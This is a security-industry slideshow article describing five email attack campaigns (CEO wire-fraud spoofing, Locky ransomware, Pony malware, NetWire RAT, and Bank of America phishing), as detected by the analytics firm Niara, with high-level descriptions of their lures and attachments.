Email is still the primary attack vector for many cybercriminals. In addition to malicious attachments and URLs, credential phishing is also on the rise and placing everyday users at the root of the attack. Why? Cybercriminals are using advanced attack methods that are consistently evading traditional detection tools. As such, organizations are beginning to realize that these advanced attacks can only be detected through multi-dimensional behavioral analytics that operate on diverse data sources and use a full spectrum of machine learning techniques.
Over a two-month period, security analytics firm Niara worked with customers to analyze email traffic and found a number of malicious email campaigns that sophisticated attackers were using to circumvent traditional defenses in order to gain a foothold within the enterprise and steal sensitive information. This slideshow presents five of the malicious email campaigns detected. Niara has also identified the tools, techniques and procedures used in each, which can be used to determine if your organization has been targeted by any of these campaigns.
Cyber Attacks Circumventing Traditional Defenses
Click through for more on five email attack campaigns that are being used to circumvent traditional defenses and gain a foothold within the enterprise, as identified by Karthik Krishnan, vice president, Product Management, Niara.
This campaign was classified as a potential targeted attack with a single recipient. Targeted attacks use personalized knowledge about a specific target with the goal of causing immediate damage to victims. It was found that the cybercriminal researched the target in advance in order to send a spoofed email to a CFO that appeared to come from the organization’s CEO. The email, which requested a reply, appeared legitimate and did not have any attachments. If the CFO had replied, the attacker would have sent another email, including information on an account for the CFO to transfer money into. Snapchat was a target of a similar tactic used to gain access to employee payroll information.
Locky Ransomware Campaign
In this campaign, attackers used malicious emails as a vector to compromise systems by installing malware from the Locky Ransomware family, which encrypts all files on a compromised system. It was found that attackers sent malicious emails to all recipients on the same day, and that all emails appeared to come from the same sender. The emails had similar subject lines with variances in the invoice number in an attempt to add authenticity to the emails. Each recipient was sent two document attachments with the same name, which included the Bartallex macro. If opened, the Locky Ransomware malware was automatically downloaded onto the system.
In this campaign, attackers attempted to compromise systems by installing malicious code that belongs to the Pony malware family. Their goal was to steal credentials and install a backdoor to establish a more persistent presence on the endpoint. The Witness campaign, a name inspired by its accompanying email attachment (witness_supboena.doc), was the largest campaign with respect to the number of malicious emails sent. Lasting over two days, it was sent to 335 employees at a single enterprise.
In an attempt to socially engineer employees, the attackers used the name of the company in the subject lines of the email followed by the string “witness subpoena.” For those who opened the attachment, malware from the Pony family was automatically downloaded onto systems.
In this campaign, attackers attempted to install a RAT (remote access Trojan) used to steal credentials and take screenshots) from the well-documented NetWire malware family. This malware has been used in both targeted attacks and crime campaigns, which are directed at multiple recipients with the goal of probing weak spots that can be used for future exploits.
The campaign targeted an organization for over a month, sending two malicious emails to 29 unique recipients within the organization. Some received an email that contained an HTML file, while the remainder received an email that contained a ZIP file.
In this campaign, attackers sent emails to unsuspecting employees, informing them of incorrect and missing details in their accounts with Bank of America. The emails, which appeared to have legitimately come from Bank of America, contained an attachment called Verify.html. When victims opened the attachment, they were rerouted and asked to provide additional personal information. After a victim filled out the information and submited the form, the information was then sent to an attacker-controlled IP hosted in Iran.